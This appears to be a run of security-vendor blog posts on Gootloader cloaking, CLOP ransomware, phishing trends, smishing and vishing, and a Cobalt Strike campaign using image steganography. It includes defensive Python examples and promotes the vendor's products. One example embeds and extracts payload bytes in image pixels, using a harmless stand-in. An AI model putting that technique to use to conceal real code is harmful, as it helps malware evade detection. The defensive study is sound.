The threat actors behind Gootloader compromise vulnerable WordPress websites and inject hundreds of pages of fake content, often totally unrelated to the theme of the website. A broad range of websites have been compromised across many industry sectors, including retail, education, healthcare, travel, music, and many more, with the common denominator that they all use the WordPress CMS.
It is not clear how the WordPress sites have been compromised. The sites may not have been updated to the latest WordPress version, or may have had vulnerable plugins that were exploited; legitimate admin accounts could also have been compromised by brute force or other means.
The content added to the compromised sites takes the format of forum posts and fake message boards, providing specific questions and answers. The questions are mostly related to specific types of legal agreements and other documents. An analysis of the campaign by eSentire researchers found most of the posts on the compromised websites contained the word “agreement”. The posts have a question, such as “Do I need a party wall agreement to sell my house?” with a post added below using the exact same search term that users can click to download a template agreement.
These pages pose very specific questions for which there are few search engine listings, so when search engines crawl the websites, the content ranks highly in the SERPs for those search terms. Relatively few individuals search for these particular terms on the likes of Google, but most of those that do are looking for a sample agreement to download.
The content added to the websites contains malicious code that displays the fake forum posts only to visitors from specific locations; all other visitors are shown an underlying blog post that at first appears legitimate but mostly contains gibberish. Serving different content to different visitors in this way is known as cloaking, and it is also what keeps the malicious posts out of sight of the site’s own administrators.
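One way to detect this kind of cloaking on a site you administer is a differential check: fetch the same URL once as a search engine crawler and once as an ordinary visitor, then compare the two responses for text divergence, keyword stuffing, and download links only the crawler sees. The script below is an added example, not code from the campaign, from the article, or from any TitanHQ product. The two HTML snapshots, the `/download.php` link and the thresholds are constructed for the example; in practice you would fetch the page with a Googlebot User-Agent and with a normal browser User-Agent (and, since the posts are shown based on location, from more than one vantage point) and pass the two bodies to `cloaking_report`.

```python
"""Differential cloaking check for a possibly compromised WordPress page.

Added example, not Gootloader code or the article's own. Compares the page
body served to a crawler with the body served to an ordinary visitor. The
two bodies below are constructed inline so the script runs offline.
"""
from html.parser import HTMLParser
import re


class _TextAndLinks(HTMLParser):
    """Collect visible words and hrefs, skipping <script>/<style> contents."""

    def __init__(self):
        super().__init__()
        self.words, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for key, value in attrs:
                if key == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.words.extend(re.findall(r"[a-z0-9]+", data.lower()))


def extract(html):
    parser = _TextAndLinks()
    parser.feed(html)
    return parser.words, parser.links


def jaccard(a, b):
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if a | b else 1.0


def cloaking_report(crawler_html, visitor_html, keyword="agreement",
                    similarity_threshold=0.5, keyword_density_threshold=0.05):
    """Return indicators; 'suspicious' is True when the crawler and visitor
    views diverge sharply or the crawler view is stuffed with `keyword`."""
    c_words, c_links = extract(crawler_html)
    v_words, v_links = extract(visitor_html)
    similarity = jaccard(c_words, v_words)
    density = c_words.count(keyword) / len(c_words) if c_words else 0.0
    # Links to archives or server-side scripts are the download bait.
    download_links = [l for l in c_links if re.search(r"\.(zip|js|php)(\?|$)", l)]
    return {
        "text_similarity": round(similarity, 3),
        "keyword_density": round(density, 3),
        "crawler_only_links": sorted(set(c_links) - set(v_links)),
        "download_links": download_links,
        "suspicious": similarity < similarity_threshold
        or density > keyword_density_threshold,
    }


# Constructed sample: what the crawler sees (fake forum Q&A with the bait link).
CRAWLER_VIEW = """
<html><body>
<div class="forum-post">
<h2>Do I need a party wall agreement to sell my house?</h2>
<p>Question: do I need a party wall agreement to sell my house?</p>
<p>Answer: yes, a party wall agreement is required. Download the party wall
agreement template here:
<a href="/download.php?file=party-wall-agreement.zip">party wall agreement</a></p>
</div>
</body></html>
"""

# Constructed sample: what everyone else sees (gibberish blog post, no links).
VISITOR_VIEW = """
<html><body>
<div class="blog-post">
<h2>Thoughts on seasonal gardening</h2>
<p>Lorem pattern fence tomorrow gravel window basket velvet ladder quietly narrow.</p>
<p>Anchor pepper stable harvest meadow copper lantern ribbon.</p>
</div>
</body></html>
"""

if __name__ == "__main__":
    print(cloaking_report(CRAWLER_VIEW, VISITOR_VIEW))
```

The similarity threshold is deliberately loose: legitimate sites personalise content too, so treat a low score as a reason to compare the two responses by hand, and treat a crawler-only link to an archive or script as the stronger signal.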
The campaign is using black hat SEO techniques to get the content listed in the SERPs, which will eventually be removed by the likes of Google; however, that process may take some time.
TitanHQ is proud to announce three of its innovative products have been named winners at the Expert Insights 2021 Best-Of Awards in the Web Security, Email Security Gateway, and Email Archiving categories.
Expert Insights helps businesses identify the most powerful, innovative, and easy-to-use cybersecurity solutions through its website, and helps clear up the confusion about cybersecurity solutions through objective reviews, industry analysis, and interviews with industry leaders. The top cybersecurity products are listed on the website along with reviews and ratings from genuine users of the solutions. Expert Insights now helps more than 40,000 businesses each month select the most appropriate cybersecurity solutions to meet their needs.
The leading cybersecurity companies and their products are recognized each year in the Expert Insights “Best-Of” Awards. Products are assessed by technology experts and the Expert Insights Editorial Team based on many factors, including market presence, technical features of the products, ease-of-use, and ratings by verified users of the products. Winners are selected in a range of different categories such as email security, web security, endpoint security, multi-factor authentication, backup, and many more.
“2020 was an unprecedented year of cybersecurity challenges, with a rapid rise in remote working causing a massive acceleration in cybercrime,” said Craig MacAlpine, CEO and Founder, Expert Insights. “Expert Insights’ Best-Of awards are designed to recognize innovative cybersecurity providers like TitanHQ that have developed powerful solutions to keep businesses safe against increasingly sophisticated cybercrime.”
TitanHQ was recognized for the WebTitan DNS filtering solution, which was named a winner in the Web Security category, SpamTitan was named a winner in the Email Security category, and ArcTitan was named a winner in the Email Archiving category. In addition to the level of protection provided, each solution is consistently rated highly on price and ease of use by enterprises, SMBs, and Managed Service Providers. The solutions are used by more than 8,500 businesses and over 2,500 MSPs in more than 150 countries. In addition to the high ratings on Expert Insights, the solutions have received top marks on G2 Crowd, Capterra, GetApp, Software Advice, and Google Reviews.
“The recent pandemic and the growth of remote working initiatives have further highlighted the need for multiple layers of cybersecurity and our award-winning solutions form key pillars in this security strategy,” said Ronan Kavanagh, CEO, TitanHQ. “We will continue to innovate and provide solutions that MSPs can use to deliver a consistent, secure and reliable experience to their customers.”
CLOP Ransomware is a fairly new ransomware variant that first emerged in early 2019, when it started to be used in attacks on large enterprises in the United States, Germany, Mexico, India, and Turkey. The number of attacks has been steadily increasing, with a major increase in attacks identified in October 2020. Since then, the ransomware has been used in many attacks on large enterprises and the ransom demands are often huge. An attack on the software company Software AG saw a ransom demand issued for $20 million.
As is the case with well over a dozen of the most prolific ransomware operations, the CLOP ransomware gang exfiltrates data prior to encrypting files. If victims have a valid backup and try to recover their encrypted files without paying the ransom, the group will leak the stolen data on the dark web, making it available to other cybercriminal operations. The media are tipped off to the data dumps, and the subsequent coverage can result in companies suffering serious reputational damage. In recent months there have been many class action lawsuits filed following ransomware attacks where stolen data has been leaked online.
CLOP ransomware is believed to be operated by a threat group known as FIN11, which is an arm of a prolific Russian cybercriminal organization known as TA505. FIN11 has targeted many different industries, although recently manufacturing, healthcare and retail have been a major focus. When attacks are conducted on organizations and companies in these sectors, the losses from downtime can be considerable, which increases the likelihood of victims paying the ransom. One attack on the South Korean retailer E-Land saw 23 of its stores close when they were unable to access their IT systems. An attack on the German manufacturer Symrise AG rendered more than 1,000 computers inoperable, causing huge losses as manufacturing was halted. Attacks on the healthcare industry mean patient records cannot be accessed, which places patient safety at risk.
Many ransomware gangs have exploited weaknesses in Remote Desktop Protocol, VPN solutions, and vulnerabilities in software and operating systems to gain the access they need to internal networks to deploy ransomware. However, the initial attack vector in CLOP ransomware attacks (and also many other ransomware variants) is spam email. Large scale spam campaigns are conducted, often targeting certain industry sectors or geographical locations. These are referred to as “spray and pray” campaigns. The aim is to gain access to as many networks as possible. The ransomware gang can then pick and choose which companies are worth attacking with ransomware.
Once CLOP ransomware is installed, detection can be difficult as the threat group has programmed the ransomware to disable antivirus software such as Microsoft Security Essentials and Windows Defender. The key to blocking attacks is to stop the initial infection, which means preventing the spam emails from reaching inboxes where they can be opened by employees.
Blocking the attacks requires an advanced spam filtering solution with robust antivirus protections. SpamTitan, for instance, uses dual antivirus engines to catch known malware variants and sandboxing to identify malicious attachments containing previously unknown malware, ransomware, or malicious scripts. Machine learning techniques are also employed to identify emerging threats in real time.
The spam emails used in these campaigns try to obtain credentials such as Office 365 logins and passwords, or get users to download malware downloaders. Additional protection against this phase of the attack can be provided by a web filter such as WebTitan. WebTitan blocks the phishing component of these attacks by preventing these malicious URLs from being accessed by employees, as well as blocking downloads of malware from the Internet.
Staff training is also important to help employees recognize phishing emails, and multi-factor authentication should be implemented to prevent stolen credentials from being used to access email accounts and cloud apps.
If you want to improve your security defenses against ransomware, malware and phishing attacks, give the TitanHQ team a call and ask about SpamTitan and WebTitan. Both solutions are available on a free trial to allow you to see for yourself how effective they are at blocking threats and how easy they are to implement and use.
The COVID-19 pandemic created many new opportunities for cybercriminals who were all too happy to take advantage. In 2020, businesses had to rapidly change their working practices to deal with national lockdowns and changed to a more distributed, remote workforce. In response, cybercriminals stepped up phishing attacks to obtain credentials to email accounts, VPNs, and remote access solutions.
The increase in email threats and phishing activity was recently highlighted by the Anti-Phishing Working Group which has been gathering data on phishing attacks from its member organizations throughout the year. Its latest report shows phishing attacks doubled in 2020, peaking in October 2020 when previous records were shattered. In October, 225,304 new phishing sites were detected, compared with under 100,000 in January 2020. From August to December 2020, more than 200,000 new phishing sites were detected each month.
Links to these phishing websites are sent in large scale phishing campaigns and many of the messages land in inboxes where they attract a click. The pandemic made that much easier for cybercriminals who expertly exploited the thirst for knowledge about COVID-19 to conduct their scams. As the year progressed other COVID-19 themed lures were used including COVID-19 relief payments for businesses, offers of early vaccines, small business loans, tax deadline extensions, and many more.
Cybercriminals often use compromised websites for hosting their phishing forms, but it is now much more common for the attackers to purchase their own domains that are tailored for each phishing campaign. These lookalike domains can easily fool individuals into believing they are on a legitimate website.
Cybercriminals have also been using encryption to hide their phishing URLs and fool employees. Hosting phishing URLs on HTTPS sites can fool employees into believing the web content is genuine, and many security solutions do not examine encrypted content which makes the URLs hard to identify and block. In Q4, 2020, 84% of phishing URLs used SSL encryption.
The increase in the use of SSL encryption is a concern, as many people mistakenly believe that a site whose address starts with HTTPS is safe, when that is not the case. HTTPS only means the connection between the browser and the website is encrypted, so sensitive information cannot be intercepted in transit; it says nothing about who owns or controls the website. A cybercriminal can obtain a certificate for a phishing domain as easily as a legitimate business can, and the secure connection just means other cybercriminals will not be able to intercept login credentials as they are entered on the phishing site.
The problem for businesses has been how to block these threats as they grow in number and sophistication. Many businesses have previously relied on Office 365 anti-spam protections for blocking spam and phishing threats, but large volumes of these malicious emails are delivered to Office 365 inboxes. When that happens and a malicious link is clicked, businesses have no way of stopping employees from disclosing sensitive information.
One way that businesses can better protect against these phishing attacks is by implementing a web filtering solution with SSL inspection. WebTitan, for instance, can decrypt HTTPS traffic, inspect the content, and re-encrypt it, which means malicious websites cannot hide behind encryption and can be identified and blocked. Note that SSL inspection only works cleanly when the filter’s certificate is trusted on the endpoints it protects; otherwise browsers will raise certificate warnings.
WebTitan also incorporates multiple threat intelligence feeds to ensure that as soon as a phishing URL is detected, all WebTitan users are immediately protected. WebTitan ensures that protection is provided against emerging phishing URLs and zero-minute threats. When combined with an advanced spam filtering solution such as SpamTitan to block phishing emails at source and ensure they do not reach inboxes, businesses will be well protected against phishing attacks.
In 2020, the healthcare industry was heavily targeted by ransomware gangs who took advantage of the pandemic to hit the very hospitals that were trying to save patients’ lives. Battling under extremely challenging conditions, the healthcare industry had to cope with these highly damaging and disruptive ransomware attacks that placed patient safety at risk.
A major ransomware attack hit one of the largest healthcare providers in the United States. Universal Health Services, an American Fortune 500 company which employs 90,000 individuals and runs 400 acute care hospitals, suffered a major ransomware attack in September which impacted all of its hospitals. Staff were forced to work on pen and paper for three weeks while it recovered from the attack.
A cyberattack on University of Vermont Medical Center in October affected more than 5,000 hospital computers and laptops and 1,300 servers. All devices had to be wiped and have software and data reinstalled, with the healthcare provider experiencing downtime for more than 2 months. During the recovery process around $1.5 million was being lost per day to attack-related expenses and lost business, with the total costs expected to exceed $64 million.
Ransomware attacks on the healthcare industry were stepped up in September and October and continued to plague the industry for the remainder of the year. A study by Tenable found that ransomware attacks accounted for 46% of all healthcare data breaches in 2020, showing the extent to which the industry was targeted.
Many of these attacks involved the exploitation of unpatched vulnerabilities, most commonly vulnerabilities in Citrix ADC and the Pulse Connect Secure VPN. Patches had been released at the start of the year to fix the vulnerabilities, but they had not been applied promptly. Phishing emails also gave ransomware gangs the access to healthcare networks they needed to conduct ransomware attacks. Check Point’s research indicates there was a 45% increase in cyberattacks on the industry from the start of November to the end of the year.
Another industry heavily targeted by hackers in 2020 was retail. Retailers were also incredibly busy as a result of the pandemic. With governments ordering people to stay home to curb the spread of the virus, online retailers saw a sales surge as shoppers made their purchases online rather than in bricks and mortar stores. Researchers at Salesforce found digital sales increased by 36% in 2020 compared to the previous year, and cybercriminals took advantage of the increase in online sales.
Several methods were used to gain access to retailers’ systems and websites, with the most popular tactic being web application attacks, which increased by 800% in 2020 according to the CDNetworks State of Web Security H1 2020 Report. Attackers also used credentials stolen in past data breaches to attack online retail outlets in credential stuffing attacks; Akamai’s tracking revealed that retail was the industry most targeted by this technique, accounting for around 90% of such attacks.
As is normal every year, the large numbers of shoppers that head online to make purchases in the run up to Black Friday and Cyber Monday were exploited, with phishing attacks related to these shopping events increasing thirteenfold in the six-week run up to Black Friday. In November, 1 in every 826 emails was an online shopping related phishing scam, compared to 1 in 11,000 in October, according to Check Point. Content management systems used by retailers were also targeted, and attacks on retail APIs also increased in 2020.
As we head into 2021, both sectors are likely to continue to be heavily targeted. Ransomware and phishing attacks on healthcare providers could well increase now that vaccines are being rolled out, and with many consumers still opting to buy online rather than in person, the retail sector looks set to have another bad year.
Fortunately, by following cybersecurity best practices it is possible to block the majority of these attacks. Patches need to be applied promptly, especially any vulnerabilities in remote access software, VPNs, or popular networking equipment, as those vulnerabilities are rapidly exploited.
An advanced anti-phishing solution needs to be implemented to block phishing attacks at source and ensure that malicious messages do not get delivered to inboxes. Multi-factor authentication should also be implemented on email accounts and remote access solutions to block credential stuffing attacks.
A web filter is important for blocking the web-based component of phishing and cyberattacks. Web filters stop employees from visiting malicious websites and block malware/ransomware downloads and C2 callbacks. And for retail especially, the use of web application firewalls, secure transaction processing, and the correct use of Transport Layer Security across a website (HTTPS) are important.
By following cybersecurity best practices, healthcare providers, retailers, and other targeted industries will make it much harder for hackers to succeed. TitanHQ can help by providing SpamTitan Email Security and WebTitan Web Security to protect against email and web-based attacks in 2021. For more information on these two solutions and how you can use them to protect your business, call TitanHQ today.
Cybercriminals use many tactics to obtain credentials that they then use to remotely access corporate accounts and cloud services and gain access to business networks. Phishing, most commonly conducted via email, is the most common method. Attackers craft emails using a variety of lures to trick the recipient into visiting a malicious website where they are required to enter their credentials, which are captured and used by the attackers to remotely access the accounts.
Businesses are now realizing the benefits of implementing an advanced spam filtering solution to block these phishing emails at source and ensure they do not reach inboxes. Advanced antispam and anti-phishing solutions will block virtually all phishing attempts, so if you have yet to implement such a solution or you are relying on Microsoft Office 365 protections, we urge you to get in touch and give SpamTitan a trial.
Phishing is not only performed via email. Rather than using email to deliver the hook, many threat groups use SMS or instant messaging platforms, and increasing numbers of phishing campaigns are now being conducted by telephone; these types of phishing attack are harder to block.
Smishing for Credentials
When phishing occurs through SMS messages it is known as Smishing. Rather than an email, an SMS message is sent with a link that users are instructed to click. Instant messaging platforms such as WhatsApp are also used. Many different lures are used, but it is common for security alerts to be sent that warn the recipient about a fraudulent transaction or other security threat that requires them to login to their account.
Recently, Allied Irish Bank (AIB) customers in Ireland were targeted with such a smishing campaign. The SMS message advises the recipient that there has been a suspected fraudulent transaction which they are required to review by clicking a link and logging in. Their credentials are harvested, and they are instructed to provide codes from their card reader or one-time passwords as part of the security check. Doing so will allow the scammers to access the account and make fraudulent transactions. A variation on this theme involves the user being told they have been locked out of their account.
In this campaign the scammers use a URL on the domain secureonlineservicepayeeroi.com, although these domains frequently change. Many campaigns mask the destination URL using URL shortening services, and one recent campaign conducted by an Iranian threat group used a seemingly legitimate google.com URL and several redirects before the user landed on the phishing page. Smishing is also often used in PayPal phishing attacks using messages warning about the closure of an account.
Vishing Attacks on Businesses Spike
In December 2019, the U.S. Federal Bureau of Investigation (FBI) identified a campaign where cybercriminals were conducting phishing over the telephone – termed vishing. Since then, the number of cases of vishing attacks has increased, prompting the FBI and the Cybersecurity and Infrastructure Security Agency to issue a joint alert in the summer about a campaign targeting remote workers. This month, the FBI has issued a further alert following a spike in vishing attacks on businesses.
Cybercriminals often target users with high levels of privileges, but not always. There has been a growing trend for cybercriminals to target all credentials, so all users are at risk. Once one set of credentials is obtained, attempts are made to elevate privileges and reconnaissance is performed to identify targets in the company with the level of permissions they need, i.e. permissions to perform email changes.
The scammers make VoIP calls to employees and convince them to visit a webpage where they need to login. In one attack, an employee of the company was found in the company’s chatroom, and was contacted and convinced to login to their company’s VPN on a fake VPN page. Credentials were obtained and used to perform reconnaissance. Another target was identified that likely had advanced permissions, and that individual was contacted and scammed into revealing their credentials.
How to Block Smishing and Vishing Attacks
Blocking these types of phishing attacks requires a combination of measures. In contrast to email phishing, these threats cannot be easily blocked at source. It is therefore important to cover these threats in security awareness training sessions as well as warning about the risks of email phishing.
A web filtering solution is recommended to block attempts to visit the malicious domains where the phishing pages are hosted. Web filters such as WebTitan can be used to control the websites that employees can access on their corporate-issued phones and mobile devices and will provide protection no matter where an employee accesses the Internet.
It is also important to set up multifactor authentication to prevent any stolen credentials from being used by attackers to remotely access accounts. The FBI also recommends granting network access using the rule of least privilege: ensuring users are only given access to the resources they need to complete their jobs. The FBI also recommends regularly scanning and auditing user access rights given and monitoring for any changes in permissions.
COVID-19 has made 2020 a terrible year for many businesses, bringing unprecedented challenges that many have struggled to overcome. The year was made worse by cybercriminals stepping up their attacks, with ransomware used to pile even more misery during extremely challenging times.
Ransomware is nothing new of course. It has been used since the early 2000s to extort money from individuals and businesses. Ransomware grew in popularity in the mid-2010s when encryption methods were adopted that were tough to crack, and the past couple of years have seen ransomware grow into the biggest cyber threat for businesses, and 2020 has been especially bad.
In Q3, 2020, ransomware attacks increased by 40% according to data from Kroll. Almost 200 million attacks occurred in the quarter, and attacks continued to increase as the year progressed. Not only are more businesses now being attacked, the amount demanded by the attackers has also dramatically increased. A report from Coveware, a firm that assists companies recovering from ransomware attacks, indicates ransom demands doubled in Q4, 2019 and there has been another doubling of demands in 2020. A recent H1 2020 Cyber Insurance Claims Report from Coalition indicates 87% of all cyber-related insurance claims are the result of ransomware attacks.
Ransomware gangs have also adopted a new tactic to increase the likelihood of their ransom demand being paid. In 2019, the Maze ransomware gang started stealing data prior to encrypting files and using double extortion tactics. In addition to paying to recover data, victims had to pay to prevent the public release of their stolen data. Since then, at least 17 ransomware gangs have adopted this tactic and threaten to publish or sell stolen data if the ransom is not paid.
The healthcare industry was hit particularly hard by ransomware in 2020, especially in the latter half of the year. Healthcare systems and hospitals have been battling with the pandemic and during these extremely challenging times they have been targeted by ransomware gangs. There was a major spike in attacks on hospitals in September and the attacks have continued at high levels since.
The pandemic has given ransomware gangs new opportunities to conduct attacks, as more remote workers introduced vulnerabilities that are easy for the gangs to exploit. Vulnerabilities in new VPN and remote access solutions are exploited, emails spreading ransomware have targeted remote workers, and ransomware has been delivered via drive-by downloads masquerading as free online collaboration tools. COVID-19 has also been exploited in lures that deliver ransomware, first offering advice on the new virus, then possible cures, and latterly vaccine related lures.
The large increase in attacks toward the end of 2020 does not bode well for 2021, and there are no signs that ransomware activity will fall in 2021. In fact, the situation may even get worse before it gets better. As long as ransomware attacks continue to be profitable, the attacks will continue. What businesses need to do is make sure they take steps to block attacks, identify them quickly when they do occur, and make sure they have a plan in place to help them recover quickly should disaster strike.
Some of the important steps to take to prevent, detect, and limit the severity of an attack are summarized below:
With so many methods of deploying ransomware, there is no single solution that will prevent all attacks. You should therefore consider the following:
Implement an advanced spam filter with best-of-breed protection against malware and ransomware, that uses signature-based detection to block known ransomware variants and sandboxing to identify new threats.
Ensure patches are applied promptly and software is updated quickly to the latest version.
Train your staff how to recognize email-based threats and provide general security training to eliminate risky behaviors.
Stay up to date on the latest threat intelligence and take proactive steps to address threats.
Use a web filtering solution to block access to risky and malicious websites to prevent downloads of ransomware from the Internet.
Enforce the use of strong passwords to prevent brute force attacks.
If you can detect unauthorized access to your systems in real time, you may be able to block an attack before ransomware is deployed. Many threat actors spend time moving laterally to identify as many devices as possible before conducting an attack, and they will attempt to find and exfiltrate data, which provides a window to detect and block the attack. You should have a monitoring system in place that generates alerts when suspicious activity is detected and, ideally, one that can automatically remediate attacks when they are detected. Many attacks occur at the weekend and on public holidays when monitoring by IT teams is likely to be reduced, so consider the mechanisms you have in place when staffing levels are lower.
You may not be able to block an attack, but you can prepare and limit the damage caused. First and foremost, back up your data so you are not at the mercy of the attackers. Ensure a backup is stored in a location that cannot be accessed from the network where the data resides, store a copy of a backup on a non-networked device, and ensure backups are performed regularly and are checked to make sure data can be recovered.
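The lateral movement window described above is detectable with a very simple rule: one account authenticating over the network to far more distinct hosts than it normally touches, inside a few minutes. The detector below is an added example, not part of the article or any TitanHQ product. It consumes Windows logon events (event 4624, logon type 3 for network logons) that have been flattened into an assumed `key=value` line format; the log lines, host names, account names and the thresholds are constructed for the example, and a real deployment would read from the SIEM or event forwarder and tune `max_hosts` per account type (service accounts for backup or patching legitimately fan out, so baseline them separately). Each alert also records whether it fired outside business hours, since the article notes attacks cluster at weekends when monitoring is thinner.

```python
"""Lateral movement fan-out detector over Windows logon events.

Added example, not the article's or a vendor's code. Flags an account that
logs on to more than `max_hosts` distinct machines within `window`. The
line format and the sample log are constructed for this example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Assumed flat export format, one event per line (not a native Windows format).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\d+) "
    r"logon_type=(?P<ltype>\d+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse(line):
    """Parse one line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def off_hours(ts, start=7, end=19):
    """True at the weekend or outside the start..end hour range."""
    return ts.weekday() >= 5 or not (start <= ts.hour < end)


def detect_fanout(lines, max_hosts=5, window=timedelta(minutes=10)):
    """Return one alert per account the first time its distinct-host count
    inside a sliding `window` exceeds `max_hosts` (network logons only)."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    recent = defaultdict(deque)  # user -> deque of (ts, host) inside window
    alerts, alerted = [], set()
    for ev in events:
        if ev["event"] != "4624" or ev["ltype"] != "3":
            continue
        q = recent[ev["user"]]
        q.append((ev["ts"], ev["host"]))
        while ev["ts"] - q[0][0] > window:  # drop events older than window
            q.popleft()
        hosts = {h for _, h in q}
        if len(hosts) > max_hosts and ev["user"] not in alerted:
            alerted.add(ev["user"])
            alerts.append({
                "user": ev["user"],
                "hosts": sorted(hosts),
                "first_seen": q[0][0].isoformat(),
                "last_seen": ev["ts"].isoformat(),
                "off_hours": off_hours(ev["ts"]),
            })
    return alerts


# Constructed sample: a normal user on Friday, then a service account sweeping
# seven hosts in five minutes in the early hours of Saturday (2021-03-06).
SAMPLE_LOG = """
2021-03-05T09:02:11 host=WS-ACCT-07 event=4624 logon_type=2 user=j.doe src=-
2021-03-05T09:15:40 host=FS01 event=4624 logon_type=3 user=j.doe src=10.0.5.21
2021-03-05T14:20:03 host=PRINT01 event=4624 logon_type=3 user=j.doe src=10.0.5.21
2021-03-06T02:14:05 host=FS01 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:14:31 host=FS02 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:15:02 host=DC01 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:15:44 host=SQL01 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:16:10 host=WS-ACCT-07 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:17:38 host=WS-HR-02 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
2021-03-06T02:18:51 host=BACKUP01 event=4624 logon_type=3 user=svc_backup src=10.0.9.2
"""

if __name__ == "__main__":
    for alert in detect_fanout(SAMPLE_LOG.strip().splitlines()):
        print(alert)
```

The alert fires on the sixth distinct host, while the sweep is still in progress, which is the point: an analyst or an automated response (disable the account, isolate the source host) still has a chance to act before the encryption stage starts.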
You should also create a disaster recovery plan that can kick into action as soon as an attack occurs to make sure your business can continue to function until the attack is fully mitigated.
A malware delivery campaign has been identified that uses phishing emails, malicious macros, PowerShell, and steganography to deliver a malicious Cobalt Strike script.
The initial phishing emails contain a legacy Word attachment (.doc) with a malicious macro that, if allowed to run, downloads a PowerShell script from GitHub. That script in turn downloads a PNG image from the legitimate image sharing service Imgur. The image carries code hidden in its pixel data, which the script extracts and runs with a single command; in this case, the payload is a Cobalt Strike script.
Cobalt Strike is a commonly used penetration testing tool. While it is used by security professionals for legitimate security purposes, it is also of value to hackers. The tool allows beacons to be added to compromised devices which can be used to execute PowerShell scripts, create web shells, escalate privileges, and provide remote access to devices. In this campaign, the hiding of the code in the image and the use of legitimate services such as Imgur and GitHub helps the attackers avoid detection.
The hiding of code within image files is known as steganography and has been used for many years as a way of hiding malicious code, typically in PNG files to prevent the code from being detected. With this campaign the deception doesn’t end there. The Cobalt Strike script includes an EICAR string that is intended to fool security solutions and security teams into classing the malicious code as an antivirus payload, except contact is made with the attacker’s command and control server and instructions are received.
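To make the pixel trick concrete, the following is an added example (not code from the campaign or from the article) of the simplest form of image steganography: writing a payload into the least significant bit of consecutive 8-bit channel values, which changes each pixel by at most one level and so is invisible to the eye and to most image checks. It works on a flat list of channel values, which is what an image library's raw export gives you (for example `Image.tobytes()` in Pillow); the cover image here is a synthetic gradient so the script runs offline, and the payload is a harmless stand-in string rather than a real stager. `lsb_plane_entropy` is a cheap triage check a defender can run over image downloads: a smooth cover has a near-constant LSB plane, and embedded script text pushes the entropy up.

```python
"""LSB steganography: how a script can ride inside a PNG's pixel data.

Added example, not code from the campaign or the article. Operates on a
flat list of 8-bit channel values; the cover and payload are constructed.
"""
import math
from collections import Counter


def _bits(data):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed(pixels, payload):
    """Return a copy of `pixels` with a 32-bit length header and `payload`
    written into the least significant bit of consecutive channel values."""
    header = len(payload).to_bytes(4, "big")
    bits = list(_bits(header + payload))
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = list(pixels)
    for i, b in enumerate(bits):
        out[i] = (out[i] & 0xFE) | b  # clear the LSB, then set it to b
    return out


def extract(pixels):
    """Inverse of embed(): read the length header, then that many bytes."""
    def read_bytes(offset, n):
        val = bytearray()
        for k in range(n):
            byte = 0
            for j in range(8):
                byte = (byte << 1) | (pixels[offset + k * 8 + j] & 1)
            val.append(byte)
        return bytes(val)

    length = int.from_bytes(read_bytes(0, 4), "big")
    if 32 + 8 * length > len(pixels):
        raise ValueError("length header exceeds image; no valid payload")
    return read_bytes(32, length)


def lsb_plane_entropy(pixels):
    """Shannon entropy (bits per byte) of the LSB plane packed into bytes.
    Near 0 for a smooth or synthetic cover; embedded text raises it."""
    packed = bytearray()
    for i in range(0, len(pixels) - 7, 8):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | (pixels[i + j] & 1)
        packed.append(byte)
    total = len(packed)
    return -sum(c / total * math.log2(c / total) for c in Counter(packed).values())


# Constructed cover: a 32x32 RGB gradient flattened to 3072 channel values.
COVER = [(i * 3) % 256 for i in range(32 * 32 * 3)]
# Harmless stand-in for the script the real campaign hid in the image.
PAYLOAD = b"Write-Output 'stage two would be fetched here'"

if __name__ == "__main__":
    stego = embed(COVER, PAYLOAD)
    print("recovered:", extract(stego))
    print("LSB entropy cover=%.3f stego=%.3f"
          % (lsb_plane_entropy(COVER), lsb_plane_entropy(stego)))
```

Real photographs have noisier LSB planes than a synthetic gradient, so in practice the entropy is compared against a baseline for the image source rather than against zero, and a positive hit is followed by attempting the extraction and inspecting what comes out. This is also why the EICAR decoy matters: a tool that stops scanning once it recognises the test string never sees the beacon logic that follows it, so scanners should classify on the whole extracted payload, not on a prefix.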
This campaign was identified by researcher ArkBird, who likened the campaign to one conducted by an APT group known as MuddyWater, which emerged around 2017. The threat group, aka Static Kitten/Seedworm/Mercury, primarily conducts attacks on Middle Eastern countries, commonly Saudi Arabia and Iraq, although the group has been known to conduct attacks on European and US targets. It is unclear whether this group is responsible for the campaign.
Naturally, one of the best ways to block these types of attacks is by preventing the malicious email from being delivered to inboxes. A spam filter such as SpamTitan that incorporates a sandbox for analyzing attachments in safety will help to ensure that these messages do not get delivered to inboxes. End user training is also recommended to ensure that employees are made aware that they should never enable macros in Word documents sent via email.
A web filtering solution is also beneficial. Web filters such as WebTitan can be configured to give IT teams control over the web content that employees can access. Since GitHub is commonly used by IT professionals and other employees for legitimate purposes, an organization-wide block on the site is not recommended. Instead, a selective block can be placed for groups of employees or departments that prevents GitHub and other potentially risky code sharing sites such as Pastebin from being accessed, either deliberately or unintentionally, to provide an extra layer of protection.
The Advanced Persistent Threat (APT) group APT32 – aka OceanLotus – is conducting a malware campaign targeting Apple macOS users. APT32 is a nation-state hacking group that primarily targets foreign companies operating in Vietnam. The data exfiltrated by the hackers is believed to be used to give Vietnamese companies a competitive advantage, although the exact motives behind the attacks are opaque.
